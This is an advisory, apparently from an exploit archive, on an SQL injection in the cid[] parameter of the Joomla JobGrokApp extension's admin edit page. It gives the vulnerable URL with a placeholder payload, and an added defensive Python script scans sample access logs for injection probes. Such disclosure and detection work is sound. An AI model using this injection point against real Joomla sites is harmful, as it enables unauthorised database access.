Joomla JobGrokApp 3.1-1.2.55 SQL Injection
Posted on 07 June 2016
######################
# Exploit Title : Joomla com_jobgrokapp - SQL Injection
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://extensions.joomla.org/extension/job-grok-app
# Software Link: http://www.uplooder.net/f/tl/42/ae553152683fc9d97a555210d7028a8c/com-jobgrokapp-V3.1-1.2.55.zip
# Category: [ Webapps ]
# Tested on: [ Win ]
# Version: 3.1-1.2.55
# Date: 2016/06/07
######################
#
# PoC:
# Log in as an admin user and edit one application. The cid[] parameter is vulnerable to SQL injection.
# Demo :
# http://localhost/joomla/administrator/index.php?option=com_jobgrokapp&controller=application&task=edit&cid[]=[SQL]
# Image: http://www.uplooder.net/img/image/30/de1049a0eb485c78590332d185ee7189/com-jobgrokapp.png
#
######################
# Discovered by : Mojtaba MobhaM (kazemimojtaba@live.com)
# Greetz : T3NZOG4N & FireKernel & Milad Hacking & JOK3R And All Persian Hack Team Members
# Homepage : persian-team.ir
######################
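
A defender-side check for the parameter named in the advisory, added here as an example and not part of the original advisory or the extension's code: it scans web access logs for com_jobgrokapp requests whose cid[] value is not a plain integer. The log lines are constructed samples, and the combined log format and the function name are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (combined log format), not taken from the advisory.
SAMPLE_LOG = """\
198.51.100.7 - - [07/Jun/2016:10:01:02 +0000] "GET /joomla/administrator/index.php?option=com_jobgrokapp&controller=application&task=edit&cid[]=12 HTTP/1.1" 200 5120
198.51.100.7 - - [07/Jun/2016:10:01:09 +0000] "GET /joomla/administrator/index.php?option=com_jobgrokapp&controller=application&task=edit&cid%5B%5D=12%27 HTTP/1.1" 500 310
203.0.113.9 - - [07/Jun/2016:10:02:30 +0000] "GET /joomla/administrator/index.php?option=com_content&task=edit&cid[]=4x HTTP/1.1" 200 2048
203.0.113.9 - - [07/Jun/2016:10:03:11 +0000] "GET /joomla/administrator/index.php?task=edit&cid[]=7abc&option=COM_JOBGROKAPP HTTP/1.1" 200 4096
"""

# Client address and request target from one log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A record id should be digits only; anything else is worth a look.
INT_RE = re.compile(r"\d+")


def suspicious_cid_requests(log_text):
    """Return (client, decoded_value) for com_jobgrokapp requests with a non-integer cid[]."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        # parse_qsl percent-decodes keys and values, so cid%5B%5D is seen as cid[].
        params = parse_qsl(urlsplit(target).query, keep_blank_values=True)
        option = next((v for k, v in params if k == "option"), "")
        # Case-insensitive match on the component name is a conservative assumption.
        if option.lower() != "com_jobgrokapp":
            continue
        for key, value in params:
            if key.startswith("cid[") and not INT_RE.fullmatch(value):
                hits.append((client, value))
    return hits


if __name__ == "__main__":
    for client, value in suspicious_cid_requests(SAMPLE_LOG):
        print(f"{client} sent non-integer cid[] value {value!r}")
```

Access logs only record the query string, so a cid[] value sent in a POST body needs request-body logging or a WAF rule to be seen.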